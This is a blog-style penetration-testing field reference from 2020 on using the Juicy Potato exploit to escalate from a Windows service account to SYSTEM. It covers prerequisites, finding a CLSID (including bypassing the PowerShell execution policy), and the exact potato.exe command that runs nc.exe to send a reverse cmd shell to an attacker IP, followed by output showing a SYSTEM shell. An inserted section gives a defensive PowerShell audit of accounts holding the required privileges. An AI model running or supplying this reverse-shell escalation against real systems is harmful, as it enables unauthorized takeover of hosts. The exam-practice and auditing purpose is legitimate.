December 16, 2020

Abusing Windows Service Accounts

Juicy Potato is a well-known privilege escalation exploit for Windows that lets most local service accounts obtain SYSTEM-level access. It is a fork of the original Rotten Potato exploit; because the original binary requires a Meterpreter shell to execute successfully, we will be using Juicy Potato, an OSCP exam-friendly alternative. This post is intended as a quick field reference when testing vulnerable machines.

Contents:

  1. Prerequisites
  2. Preparing the Snap
  3. The Snap
  4. Errors

Prerequisites

  • You have obtained a shell as a service account (e.g., NT AUTHORITY\IUSR or NT AUTHORITY\LOCAL SYSTEM).
  • The SeImpersonate OR SeAssignPrimaryToken privilege is enabled for that account.
  • WinPEAS or Exploit-Suggester reports that the patches preventing this are not installed.

When all of the above requirements are satisfied, you can escalate your privileges using Juicy Potato.
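An added defender-side check, not code from the original post: this PowerShell snippet audits which principals on a host hold the two privileges named in the prerequisites and flags any grantee that is not a stock Windows default. It assumes an elevated prompt and secedit.exe (shipped with Windows); the default SID lists and the temporary file name are my own choices.

```powershell
# Added defender-side audit (not part of the original post). Lists who holds the two
# privileges Juicy Potato needs. Run elevated; assumes secedit.exe is present (it ships
# with Windows). On Windows 10 1809 / Server 2019 and later, DCOM hardening already
# breaks this technique, so the privilege holders matter most on older hosts.
$cfg = Join-Path $env:TEMP 'user-rights-audit.inf'
$null = secedit.exe /export /cfg $cfg /areas USER_RIGHTS

# Default grantees (SIDs) for each privilege on a stock Windows install (assumption:
# Administrators, LOCAL SERVICE, NETWORK SERVICE, SERVICE). Anything beyond these,
# e.g. a custom service account or an IIS app pool identity, deserves review.
$defaults = @{
    'SeImpersonatePrivilege'        = @('S-1-5-32-544', 'S-1-5-19', 'S-1-5-20', 'S-1-5-6')
    'SeAssignPrimaryTokenPrivilege' = @('S-1-5-19', 'S-1-5-20')
}

function Resolve-Principal {
    # secedit writes SIDs with a leading '*'; translate to DOMAIN\Name when possible.
    param([string]$Entry)
    $raw = $Entry.TrimStart('*')
    try {
        $sid = New-Object System.Security.Principal.SecurityIdentifier($raw)
        return $sid.Translate([System.Security.Principal.NTAccount]).Value
    } catch {
        return $raw   # unresolvable SID (orphaned account) or a literal name
    }
}

$report = foreach ($line in Get-Content $cfg) {
    # Example line: SeImpersonatePrivilege = *S-1-5-32-544,*S-1-5-19,*S-1-5-20,*S-1-5-6
    if ($line -match '^\s*(Se\w+Privilege)\s*=\s*(.*)$' -and $defaults.ContainsKey($Matches[1])) {
        $priv    = $Matches[1]
        $holders = $Matches[2]
        foreach ($entry in $holders.Split(',')) {
            $raw = $entry.Trim().TrimStart('*')
            if (-not $raw) { continue }
            $status = if ($defaults[$priv] -contains $raw) { 'default' } else { 'REVIEW' }
            [pscustomobject]@{
                Privilege = $priv
                Holder    = Resolve-Principal $raw
                Status    = $status
            }
        }
    }
}
Remove-Item $cfg -ErrorAction SilentlyContinue
$report | Sort-Object Privilege, Status | Format-Table -AutoSize
```

Rows marked REVIEW are the accounts to tighten (remove the right via Local Security Policy or GPO) or to isolate, since an attacker who lands a shell as one of them has met the prerequisite above.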

Preparing The Snap

  1. Download the exploit from here and upload it to the victim machine.
  2. Get the name of the operating system (e.g., Windows Server 2008 R2 Datacenter).
  3. Using the name of the operating system, find a valid CLSID to use for the exploit. This identifies the COM object whose token you will be impersonating.

If you can run PowerShell scripts and have an interactive shell, you can download GetCLSID.ps1 to retrieve a list of valid CLSIDs. You may have to run the script with -ep bypass if script execution is blocked on the system.

The Snap

Now that you have the PoC on the machine and a valid CLSID to impersonate, you can escalate your privileges.

  1. Start up a netcat listener on the attacker machine.
  2. On the victim machine, run the following command to toss back a reverse shell for you to catch:

     potato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\nc.exe -e cmd.exe 10.10.14.6 443" -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}

Example of successful output:

C:\inetpub\drupal-7.54> potato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\inetpub\drupal-7.54\nc.exe -e cmd.exe 10.10.14.6 443" -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}
potato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\inetpub\drupal-7.54\nc.exe -e cmd.exe 10.10.14.6 443" -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}
Testing {9B1F122C-2982-4e91-AA8B-E071D54F2A4D} 1337
....
[+] authresult 0
{9B1F122C-2982-4e91-AA8B-E071D54F2A4D};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

You now have a SYSTEM shell.

Errors

COM -> recv failed with error: 10038

Try a different CLSID. I got lucky using the one at the top of this list, but it won't always be that way.